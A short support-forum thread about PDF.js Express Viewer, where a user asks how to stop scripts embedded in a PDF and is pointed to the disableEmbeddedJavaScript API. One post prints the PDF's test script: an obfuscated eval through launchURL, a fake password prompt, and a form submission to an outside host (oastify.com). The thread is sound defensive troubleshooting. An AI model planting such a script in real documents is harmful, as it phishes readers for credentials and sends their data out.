XSS execute script in pdf file

dangpt · August 11, 2023, 1:13pm

Hi team,

Could you please my issue,

I used PDF JS Express Viewer on your site , Version: ‘8.7.0’.

In PDF File has function execute script, i dont want to execute this function.

Could you support prevent xss with pdfjsexpress viewer .

Best Regards !

sample_test.pdf (3.7 KB)

kkim · August 11, 2023, 3:31pm

Hi there,

Thanks for reaching out to pdf.js express forums,

Opening your provided PDF on Chrome, I can see that there is a password requirement:

Please follow the forum post guide here on opening PDFs with password:

Best regards,
Kevin Kim

dangpt · August 11, 2023, 3:36pm

Hi kkim,

it’s just script in my pdf file, you can check code

(function(){
try {
app.launchURL("javascript:eval(atob('YWxlcnQoJ2hhaGEnKQ=='))",false)    
var cResponse = app.response({cQuestion: "Enter your password to access this page: "});
this.submitForm("http://oastify.com");}
catch (e) {app.alert('abcd'); }
})() )

this script in my pdf file.

And i dont want to execute this script

Best Regards

kkim · August 11, 2023, 4:06pm

Hi there,

What you could use is the disableEmbeddedJavaScript API
https://pdfjs.express/api/Core.html#.disableEmbeddedJavaScript__anchor

Best regards,
Kevin Kim

dangpt · August 11, 2023, 4:35pm

Best Solution.

Thanks for your support @kkim .

Topic		Replies	Views
CVE-2024-4367 vulnerability in pdf.js Technical Support	3	202	July 4, 2024
How can i open password protected pdf file? Technical Support	5	2531	February 16, 2022
Dectect document with password protection Technical Support	1	5	November 20, 2024
Download password-protected PDF Technical Support pdfjs-express	4	373	January 4, 2023
Set password for generating pdf Technical Support	2	378	February 3, 2022

XSS execute script in pdf file

Related topics